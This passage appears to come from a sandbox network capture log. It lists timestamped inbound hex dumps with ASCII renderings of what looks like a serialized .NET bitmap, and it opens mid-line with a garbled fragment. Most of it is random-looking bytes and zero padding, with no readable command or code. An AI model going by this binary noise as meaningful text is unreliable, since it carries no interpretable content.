=>C\\pG^&7/xbln$bp}#H0F6$m"0LTr%_K8b-A;`_63,qlwL\65r $B+``y@QSystem.Drawing, Version=4.0.0.0, Culture=neutral, Publi
2021-10-16 14:53:37 UTC	2629	IN	Data Raw: d9 b0 eb ed bd 7d 34 bd 5f 41 3e 6d ce e7 15 6b 6a da 08 96 63 c9 9e 07 c5 a1 cc 1d ab 37 8e dc 37 25 62 63 e5 54 f1 d3 5b 94 30 66 09 20 ad 1c f0 40 3b a6 5e 06 5e 3e 4b d1 b6 77 b3 df 4a 42 75 26 de 6e 53 19 2e 7a 3e a0 64 b5 da b7 6d df a7 f8 ad bc 45 c1 b4 b7 36 d5 ce 46 9d c1 ed ee 3a 1d 51 95 59 7d f2 57 59 fb c6 a6 b4 af 13 b2 63 1e 46 e9 1d 47 92 0a a1 48 d0 5e 5b 44 6e 6c 52 e1 8e 33 a7 1b bd da 36 ce 1a 6f e2 97 92 6a e8 ee 79 bd 6d d8 ec b7 eb 90 a1 5f 36 2d 01 c6 90 ed 65 61 ac 32 98 6f bb eb 58 1d 24 2d d2 af 95 d0 96 de 0f f4 ee f1 06 21 78 93 84 7f 02 f8 a6 66 f0 92 9d 21 dc e4 f1 db 50 59 c5 e1 ae a8 0d 8d b0 a2 1e 1c 34 92 55 cb 65 26 05 1a 2c 3e 9f 27 fc 88 dd f3 b8 34 ed e9 23 85 de ef fe d4 c7 0c 01 8e 02 83 86 eb 46 80 9d 73 59 9a e8 Data Ascii: }4_A>mkjc77%bcT[0f @;^^>KwJBu&nS.z>dmE6F:QY}WYcFGH^[DnlR36ojym_6-ea2oX$-!xf!PY4Ue&,>'4#FsY
2021-10-16 14:53:37 UTC	2645	IN	Data Raw: e6 ac 78 72 52 fc 09 f1 ab 55 c9 8e 41 e3 22 05 e7 c8 54 41 60 ca 2b 05 2f 39 dd 9e 48 ae 60 3c b6 00 97 fe 96 a1 2a fe 1d bb 86 83 d7 7e 32 e9 54 2a 74 41 d6 59 8b 3f 70 df f6 7d aa 55 af 32 ee a0 d3 17 40 0b b8 7b 9c 8e 16 a2 96 a1 70 f5 a0 db e8 69 a8 25 ce e7 27 d9 42 66 c5 2a 82 24 6f db 37 7f 13 28 81 b3 74 0f 62 72 ae 02 a1 a7 34 96 1f be 6f fe a7 37 49 0f 14 ff be 5e b9 39 de 9f e1 7f 51 34 9c fb 4e 09 48 20 c7 16 17 ca 80 5c f0 4f fd 8a 65 16 16 77 25 cc da 05 59 eb 8b ae 49 fa 59 6b 56 56 82 9e e2 11 6f 3f 48 62 4b d6 32 08 72 14 46 87 12 6a 90 65 7a 14 0a 2a f6 16 8b 0b 86 27 8d 9e d4 b9 40 10 30 80 7d 92 14 17 72 37 95 60 e4 aa d5 34 71 ea 32 4f 91 31 1c 9f 62 49 22 a4 f6 35 27 75 ac e3 45 3d 8f 34 41 00 7d 2c 2b 69 cc 54 a8 de 5e ee 21 67 f2 Data Ascii: xrRUA"TA`+/9H`<~2TtAY?p}U2@{pi%'Bf$o7(tbr4o7I^9Q4NH \Oew%YIYkVVo?HbK2rFjez'@0}r7`4q2O1bI"5'uE=4A},+iT^!g
2021-10-16 14:53:37 UTC	2661	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2021-10-16 14:53:37 UTC	2677	IN	Data Raw: b2 cd 46 e2 25 49 fe d8 69 65 c5 e1 33 81 59 f1 20 28 14 5a 8e 69 31 ad 11 f8 3f 1e 1d ab 42 c4 97 70 e9 65 d8 90 02 8e 51 3c 2d 15 06 bd 80 94 18 83 31 5b db bc ad a2 7d da 9b 06 82 ef 82 12 c0 e4 35 65 de 0d 70 95 76 09 15 46 8d d7 82 b5 cf fc 02 74 64 86 32 70 1a 70 53 16 dd 65 a0 c9 15 36 01 1d 57 1f 0f 1b f8 db a7 82 41 9e b0 50 fd 75 44 45 66 91 c7 88 df 48 25 89 1d 82 10 3a 17 33 04 24 3a f6 32 0d 0f 6a 26 dd ba 55 60 5f 00 f8 86 62 dd 12 b1 37 ef f6 99 94 ce b2 ef ed f7 21 ce 59 8d cd 2a 23 9e 05 de 3a d3 be c1 3e 81 ed b3 ca cf c0 92 a7 f0 4d 42 3c 75 16 c5 f5 22 cb c4 bf a1 ac e1 cc 0d 30 86 b6 4a a1 69 09 f0 60 91 90 f8 e7 fb d3 db a1 31 3b bb 12 59 87 2e 86 63 3e 87 16 0e 12 dd 09 20 86 d5 72 c2 b5 b1 2a bc 5c ed 8a 79 19 df 8f a5 13 1b af 83 Data Ascii: F%Iie3Y (Zi1?BpeQ<-1[}5epvFtd2ppSe6WAPuDEfH%:3$:2j&U`_b7!Y#:>MB<u"0Ji`1;Y.c> r\y
2021-10-16 14:53:37 UTC	2693	IN	Data Raw: 23 df 14 c7 9a b6 98 4d e5 5d a1 c2 21 ed b6 40 fb ea 31 73 e1 fa ea 10 1e 58 f1 15 c7 e9 43 a3 aa ab 5f 59 31 46 38 e5 94 41 7a 9a 6a 58 9a 0c c2 27 0c a0 85 be 8b 42 3d e6 09 a6 c3 a3 f8 bd 3e 3f 52 d9 43 77 de d4 8a f7 9f 84 5a d2 92 a9 d0 f4 56 de 60 1a cc 76 0a d2 20 b9 d3 f5 e7 0e 48 c7 cd 8f 29 f6 35 dd 05 6a 2c 27 97 3d 21 01 e7 20 b3 a6 f2 c2 d0 c9 4f af 05 3c be ad 5d c0 95 91 58 f4 0b 1f 0d af 1d b6 82 3a 48 08 e5 0f 80 0b 5e 1f a5 79 3a 7d 30 be 5b 7e 97 3a ab 60 d9 6a a3 b4 0b 1e d2 f8 1c 69 c9 15 54 fc f6 23 0b 20 de 76 76 68 de 67 5b 75 21 40 76 50 05 75 c7 b2 8a ef 2b 65 78 80 12 81 46 3e 7d 32 ba 54 10 1f 82 b8 31 99 17 94 ee ec e8 51 d8 b4 2d b4 fe 07 f8 d4 cc 58 dc fd b8 c2 8f 86 b9 0f 75 d2 1b 62 49 c8 0c ca 8d 26 aa 5e 22 a5 8a ec e9 Data Ascii: #M]!@1sXC_Y1F8AzjX'B=>?RCwZV`v H)5j,'=! O<]X:H^y:}0[~:`jiT# vvhg[u!@vPu+exF>}2T1Q-XubI&^"
2021-10-16 14:53:37 UTC	2709	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2021-10-16 14:53:37 UTC	2725	IN	Data Raw: 67 2c 20 56 65 72 73 69 6f 6e 3d 34 2e 30 2e 30 2e 30 2c 20 43 75 6c 74 75 72 65 3d 6e 65 75 74 72 61 6c 2c 20 50 75 62 6c 69 63 4b 65 79 54 6f 6b 65 6e 3d 62 30 33 66 35 66 37 66 31 31 64 35 30 61 33 61 05 01 00 00 00 15 53 79 73 74 65 6d 2e 44 72 61 77 69 6e 67 2e 42 69 74 6d 61 70 01 00 00 00 04 44 61 74 61 07 02 02 00 00 00 09 03 00 00 00 0f 03 00 00 00 e6 16 00 00 02 42 4d e6 16 00 00 00 00 00 00 36 00 00 00 28 00 00 00 2c 00 00 00 2c 00 00 00 01 00 18 00 00 00 00 00 00 00 00 00 c4 0e 00 00 c4 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: g, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3aSystem.Drawing.BitmapDataBM6(,,
2021-10-16 14:53:37 UTC	2741	IN	Data Raw: 00 1e de dd 98 92 b3 f4 fe 61 4e c1 ac 0c 7a 83 d0 06 34 1c 5a dd a6 c7 43 3c 94 8f 46 b9 e0 e2 29 01 25 ee ce 09 db b8 db 34 cb 0d 51 cb ec 86 85 29 24 a5 32 fb 16 d9 f8 3d 31 54 42 19 92 08 90 c4 5d 8b 7f 5a 6f e3 4b 30 62 03 7e 17 88 62 44 1f b1 16 71 c2 5c 53 15 b2 80 b4 13 77 e6 dc 48 45 3e 88 bb ef 8f f2 29 1b 79 ce 30 00 00 97 b3 e5 9f ec 7c d0 7a 9c 88 3a 42 7d b1 29 41 ba eb 62 b4 7a 1d 47 d2 09 8f 4c ab 40 81 39 db 9e 1a 12 23 49 06 fc 6b a6 0f 28 07 20 98 b1 6e 12 b0 a4 18 11 bc 3c 0b 3e ff 52 de fc 8c 8b fc 2b 55 77 80 53 89 53 86 6e 5e 60 16 6d c4 88 15 68 ac 78 67 45 3e 81 79 92 90 3e 80 c3 c7 8a 9a 22 69 cf 38 1f 0c c6 a6 be 34 29 f0 cf de 0a 3b 8a d6 dc dd 03 04 b0 7d e9 29 51 57 f1 aa ba 0e 3e 25 b7 0e f5 02 7f db 47 06 0f ea 6a 55 10 d7 Data Ascii: aNz4ZC<F)%4Q)$2=1TB]ZoK0b~bDq\SwHE>)y0\|z:B})AbzGL@9#Ik( n<>R+UwSSn^`mhxgE>y>"i84);})QW>%GjU
2021-10-16 14:53:37 UTC	2757	IN	Data Raw: 3d 80 79 4b 22 dc 20 46 23 0d 72 e8 7f 6b ee 60 d2 33 14 ba 6d 0d 35 22 65 7d 04 4e af f9 43 1f 7d 09 d7 f5 a8 cf 2d 5e e0 c8 ba cb 7d e5 6e 65 87 f4 1c 65 9c 78 a1 ff a3 0f e5 08 6a 6c 2b 56 97 9f ff 47 51 bb 26 bd 0b 5c 1a 5c 84 cb 9c 80 ca a7 cd b9 71 bb 04 e5 4e d1 42 9d 64 9c 21 4a 3c de 1f 59 c7 cb 0e ab b8 c8 2c a9 a8 cb a7 cb 30 69 07 ba 68 f1 7a ae f2 ec 0b b4 3b 56 b1 bd 10 e5 09 07 be 93 be 0d da d9 12 92 0a c2 8d 22 f9 95 2d c6 d1 eb ef 33 60 a1 b0 b6 95 26 72 0b 8b f8 27 92 fc c7 e5 84 92 4f e6 9b d4 b5 fd 12 e8 3d e8 b1 fa cb 84 0f eb d3 1e 4d f3 9b 43 c8 4c b9 fe b3 42 68 dd 22 f7 0b 82 31 9f fe fe 94 d2 68 e4 df 20 da be a4 45 98 a0 5a 8b 92 cd f2 96 26 4e 40 a3 49 a5 cc 51 4f fb 43 3b b8 c7 c9 7c 12 d4 8e ff 1b ee e2 5d 2b 27 7c e0 65 35 Data Ascii: =yK" F#rk`3m5"e}NC}-^}neexjl+VGQ&\\qNBd!J<Y,0ihz;V"-3`&r'O=MCLBh"1h EZ&N@IQOC;\|]+'\|e5
2021-10-16 14:53:37 UTC	2773	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2021-10-16 14:53:37 UTC	2789	IN	Data Raw: f7 c2 b6 5d 01 e4 78 95 99 b7 b4 4f c2 33 27 9a 10 18 ee 96 eb a9 8f 4a 05 53 8c 88 41 f8 54 f7 b3 63 fc 2a 0a ad d6 93 53 09 ce fb 69 b0 35 1f c3 ba af 68 73 35 68 fd 1e 06 f5 82 36 60 80 19 36 c2 41 07 a7 71 a0 79 fe 84 2b 0d 5c 19 42 f5 70 27 a1 23 52 63 a4 58 54 66 24 34 bd 6a 3c 5c 19 bd 97 f3 8b 8f 95 66 04 f7 3c 6e 3c f9 86 0c 4f 00 a9 88 64 d5 61 bd 7e ad e2 af f2 45 54 fb 83 fb 98 14 a4 a6 ef f5 64 49 94 c5 7b 1a 04 19 82 5f a7 57 29 df a8 66 7b 68 a5 0a c7 5b b9 a7 2f 0e 42 08 c1 cc 98 8d d8 96 8e 13 46 f0 e7 9d c3 e4 b0 ac 68 6d 48 49 86 a1 f8 10 e9 63 af b2 82 8e 63 f5 f0 06 03 d1 2d b9 1b 27 e7 63 8f 3e 4c 81 92 5b 3d 37 b4 b0 54 6d 39 51 2f 50 90 9d 87 37 c9 8c db e9 5f 26 8f be 78 ac a7 35 1d d9 d7 96 44 ff c7 1b 28 d2 4a 85 61 e6 c4 bb b2 Data Ascii: ]xO3'JSATc*Si5hs5h6`6Aqy+\Bp'#RcXTf$4j<\f<n<Oda~ETdI{_W)f{h[/BFhmHIcc-'c>L[=7Tm9Q/P7_&x5D(Ja
2021-10-16 14:53:38 UTC	2805	IN	Data Raw: 9d 53 30 e9 72 d5 fe 3d 90 f2 01 0e a7 fc 98 00 9c 5e fb 23 93 61 e8 86 81 36 fd 14 37 8d f6 ff 87 88 b4 62 10 5d 2b d7 79 f9 f8 da 64 25 5b ba f6 53 18 e0 49 51 45 da 87 06 d8 b8 7e 33 08 62 d2 c2 12 88 f6 f3 18 89 39 cb 51 99 c6 3b 62 17 3b bc 8b bb de c1 bb a1 86 ed 89 76 d1 be f6 18 16 c8 a6 8e e9 77 6a 5f df 39 51 0c 2d cc c5 94 34 f6 f9 bc a2 63 b2 53 30 aa b7 95 e7 e5 37 fd 67 33 39 06 ab 64 1c 21 7a 91 92 ef 14 8d 0b 5e 31 9a 2a 44 c5 46 c2 29 11 6e ac dc 11 50 58 4f cd da 51 75 1b ed c2 d5 a2 60 ef 30 69 5f 3c 1f 31 6a 38 ed fa 86 ba 8b 58 65 e3 f2 d8 8e 85 20 b4 db 19 0c 24 1d c6 69 e8 bc 15 e2 0e 0c 18 f5 a5 8b fa 0f 25 c7 3f 96 28 e2 ea a0 69 77 ec 08 0a 53 66 a7 76 37 c4 8c 5d 9f f3 8c 79 95 cb 91 ef c5 64 75 52 6b 27 0d 3c 2c 13 c9 65 c5 1c Data Ascii: S0r=^#a67b]+yd%[SIQE~3b9Q;b;vwj_9Q-4cS07g39d!z^1*DF)nPXOQu`0i_<1j8Xe $i%?(iwSfv7]yduRk'<,e
2021-10-16 14:53:38 UTC	2821	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f3 d7 47 78 73 a5 7a e5 cf 13 c7 1a b8 ab 31 2f e1 ef 19 9b 29 f7 88 19 ec 6f 42 81 2d c8 bb bc ce 28 f6 04 7a 6b c8 05 b3 8c 1b 4b 4c 9a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: Gxsz1/)oB-(zkKL
2021-10-16 14:53:38 UTC	2837	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2021-10-16 14:53:38 UTC	2853	IN	Data Raw: f8 2b 39 dd 26 84 49 ba a2 0e a6 fd a5 bc 04 db 9f 4c a7 8d 37 ed 80 63 32 7a 39 43 10 6c 22 d2 7a 54 52 aa 87 87 f0 63 bd 4c a7 7b dd f5 3b b9 86 12 8f 37 22 e3 91 cd 73 94 de 5f 5b 88 f6 cf 34 ed 54 91 e0 18 16 cb ac 43 89 f5 86 c4 01 81 bb 10 3c 4e 8e 25 82 fb 4b de 51 44 eb da 7f 6f a5 96 7d 77 47 e3 7f 43 3a dc e2 21 29 16 d4 45 b8 c1 a9 00 d0 f1 f1 2f ed 5b 17 b7 65 46 98 0c a3 d9 e2 e4 d9 5a 21 29 b8 f9 54 1b 5c 6c 96 22 4f a6 9e 93 38 b5 c0 26 24 20 ef f0 42 77 56 5b e7 13 2a dc 5b 97 bb 6b be 39 b5 ca 21 58 59 2a bc a3 a1 ce 90 38 f5 50 c9 19 2f e9 73 46 ed 00 42 f7 b0 22 c2 5c d1 bb cc 8d 57 1a e6 a4 3c ee 8d 5f a4 81 de 37 52 b9 ca 76 e0 00 4a 11 fd 8b 6c 47 26 e1 c3 ab 24 ba 8c cd a1 ec 03 2b 4b 11 f1 bb 1b ef 10 bd 89 16 20 40 8f da 94 cf f3 Data Ascii: +9&IL7c2z9Cl"zTRcL{;7"s_[4TC<N%KQDo}wGC:!)E/[eFZ!)T\l"O8&$ BwV[[k9!XY8P/sFB"\W<_7RvJlG&$+K @
2021-10-16 14:53:38 UTC	2869	IN	Data Raw: 74 aa 2b a8 12 10 93 e7 fb 19 85 8c d4 01 dd 26 d4 0e c8 cc c5 1d 42 11 2c a5 51 5b 51 7b 58 a1 a1 38 47 8b 51 42 93 26 70 72 10 b3 eb 46 90 82 0e 30 70 f2 e0 e9 40 22 fb cc c1 13 46 08 48 71 8a 10 6e c3 e5 68 23 c7 a8 c9 cd 1d f3 e2 c9 8c 93 fb 01 c0 d6 7e 56 38 f1 76 b4 7a 30 34 5b dc 05 5a 0e 9f 30 48 71 8a 73 58 fa 38 4d 6d 4d 82 65 28 ef e4 77 a6 42 08 55 83 8e 0e 96 88 dc fb 28 70 f4 10 97 5b 42 7a ce 44 83 63 70 8c f5 31 16 0c 09 70 79 68 00 98 98 b2 b0 95 f1 e8 1f 80 ca bc aa 1e fd 7f 82 ac 4c a4 56 f9 2f 41 84 e2 f4 31 cf 93 e4 bd 11 12 8e d3 9d b0 66 55 2e 6e 5d 75 a8 d9 a8 70 ff 3d 09 8c ec a6 7d 85 80 3d 6a a0 3b 19 35 6b 2f 04 30 24 43 6e 45 8b 86 50 ee 6d 71 5a 41 73 90 f6 32 ba 51 0d 11 a6 78 8d 35 7d 00 27 60 83 80 49 65 ea dc 56 11 30 92 Data Ascii: t+&B,Q[Q{X8GQB&prF0p@"FHqnh#~V8vz04[Z0HqsX8MmMe(wBU(p[BzDcp1pyhLV/A1fU.n]up=}=j;5k/0$CnEPmqZAs2Qx5}'`IeV0
2021-10-16 14:53:38 UTC	2885	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2021-10-16 14:53:38 UTC	2901	IN	Data Raw: 16 58 3a 91 a1 cb 5d 9a a8 ef 34 c1 f7 8c 7e 76 23 5e 06 db 8e c3 d3 cf 22 3b c9 f7 2c 1f bd 00 1e 8e a1 b0 cb 83 d2 e1 9a d5 01 91 41 16 83 52 e7 e8 44 03 19 9f 48 6b e4 aa 12 6b c6 ee 52 40 f3 e6 22 b6 d6 85 b2 f8 92 6b 70 02 68 b7 96 8e ae 0d b4 b2 01 37 3a 3e 3c b2 f9 84 93 fd 8e 63 01 4d cc b6 00 6c 80 4e 3b 73 53 ab 68 48 50 1a 80 cf c2 bd f5 48 d5 0e 84 5d 51 e0 fd d8 c6 52 4f ec a2 1e 88 15 f4 bd 30 4a d2 8e e7 35 6d 19 43 03 b0 87 f6 83 b2 1b 32 6f 13 88 b0 fd ac 91 ff 2d 03 36 aa 87 f5 5c 84 c3 82 94 4b 5a 63 0d b2 3c 7c 3c fa ea e8 c2 19 29 79 13 91 44 27 72 28 e4 f1 aa 91 b1 2f 4b 7c 12 d8 d5 71 a4 f4 b8 b5 0d 5c a5 3e b4 b6 f9 fc 2f df eb 59 46 f4 d6 59 0a 4d 94 8d c9 ea 5f 72 c6 37 7b 15 32 b6 ae fe bd 0c 59 67 22 08 5d 51 65 39 22 cd 08 19 Data Ascii: X:]4~v#^";,ARDHkkR@"kph7:><cMlN;sShHPH]QRO0J5mC2o-6\KZc<\|<)yD'r(/K\|q\>/YFYM_r7{2Yg"]Qe9"
2021-10-16 14:53:38 UTC	2917	IN	Data Raw: 44 2e f9 d9 ce 56 70 f0 df ce 09 75 dd 89 5d 4d 97 96 e4 a9 f7 29 6b 58 6c ab 91 c5 f9 18 71 9a 3d 4b ba 57 85 d8 cb 22 fd af ec b1 f2 46 53 2b 43 c7 f1 3f 54 25 a4 9e 36 64 a7 23 17 3d 45 85 0d 0d ae 2c 02 1b bf bf 41 95 6b 14 96 2e a7 f0 2d 68 ce 0f 1f fa e9 35 84 91 07 0f fd ca d9 4b 62 33 2f 0f 48 18 00 8d 3c ab 9f 2a 1c d1 ce 09 b1 3f 38 da fa 3e 47 6e a6 2c 34 53 ed b2 6a 9c 78 b9 c4 14 53 8f 86 8c 6f e0 2f ed f0 0a b3 a2 6d 2e e8 ea 8b 54 04 d4 ee 28 42 30 ed 68 4d db 88 2a fb 4d 80 d3 f3 65 47 38 1e 7b b0 08 2f 18 79 52 9b b1 40 1d 0c 5d 9d 89 90 1b 5d af 49 b3 92 48 46 4c 0c 5e 54 a4 7f 78 f4 0c 9b 6c 70 bb e6 f8 c7 6b 4f ec cc 75 91 22 80 5e 6b d4 4c 10 d5 4b df 05 79 43 e2 2a 23 bc 06 66 06 cf 4c a5 1e 4e 38 cd 31 4e 29 ed 89 f2 6b e1 c7 94 cb Data Ascii: D.Vpu]M)kXlq=KW"FS+C?T%6d#=E,Ak.-h5Kb3/H<?8>Gn,4SjxSo/m.T(B0hMMeG8{/yR@]]IHFL^TxlpkOu"^kLKyC*#fLN81N)k
2021-10-16 14:53:38 UTC	2933	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6d 45 08 22 a8 36 41 40 2b 6b 75 6d 99 10 fe 12 a6 ec 12 77 66 51 44 d8 6d c4 c3 55 75 a9 02 db b9 e3 57 c7 65 3f d8 3b 2e bd 79 e2 51 88 dc 3b 74 83 ce ce ef 29 f1 d8 51 15 f4 75 ab a6 b7 e2 44 11 aa 69 9b 24 da 86 f3 6d b9 2e 2b 29 62 be 42 82 0c 27 10 43 e4 7b 7d 93 09 dc bf 2f 46 c6 c4 bf f9 52 bd df 81 3b c8 65 37 b0 12 6b 5d e7 3a 28 61 8e 70 c8 6e b4 0e ef 4f 3a d6 8d b8 e9 36 4a 65 87 a5 40 3b cd bb 17 0a 11 9b e4 a8 e4 d9 bd 7a 7d b9 a7 dc 80 4e f7 cb 36 a9 37 31 cc d8 01 51 3f e6 89 36 bb 32 ce 3d 6f 70 7c b3 ae 6a 95 ac be 54 d8 a3 54 55 a8 89 38 b7 cf 3a 41 86 59 91 88 e6 a9 ce 3a f3 e5 11 b2 16 46 0d 99 86 a6 8c 84 ef Data Ascii: mE"6A@+kumwfQDmUuWe?;.yQ;t)QuDi$m.+)bB'C{}/FR;e7k]:(apnO:6Je@;z}N671Q?62=op\|jTTU8:AY:F
2021-10-16 14:53:38 UTC	2949	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2021-10-16 14:53:38 UTC	2965	IN	Data Raw: a9 e5 cd 89 38 7c d0 e4 61 7e 82 27 64 e4 42 5b 2f a7 47 26 50 ef 30 42 83 4c a5 48 9e 72 79 68 43 00 6e db ad a4 87 ea 83 94 06 f2 4c fa 79 1f 1a 70 2e 48 36 71 fa 85 00 70 e9 31 69 4d cf 71 bd c8 b9 ba 4b 00 f2 79 d8 84 5f 73 be c4 5f e7 8c 1d a1 bf 90 2f e5 68 8d 34 74 0f 56 d8 77 60 45 b8 bb b9 2f 96 c1 02 35 26 32 46 54 dc fb 0f 1a 82 fd bf 6e 16 ae ee 27 99 8b f9 d1 0d 9a d3 16 17 b5 b2 35 d9 63 8f 20 4b 9c 90 f6 b9 cd 54 d6 5f 24 69 7e 43 ff 9d 99 55 2d 60 72 ad 86 2e c1 e1 5c 13 dd 5f 95 df 1d ef 87 f0 30 14 37 3f ec 39 fb 5a 4b 12 09 8f e9 b2 54 88 37 7b ad 7d ba e1 b9 3b 6b fc 73 e2 31 31 3d 4b cc 6f a6 e7 4e 26 7b f1 24 f0 6f 22 9c a1 d3 0a ed 69 49 dc b1 1a 4a c8 38 06 5c 81 d7 71 7f cd d0 59 bf 6d 37 29 75 cb be 1d 13 03 d8 b1 16 84 44 d7 70 Data 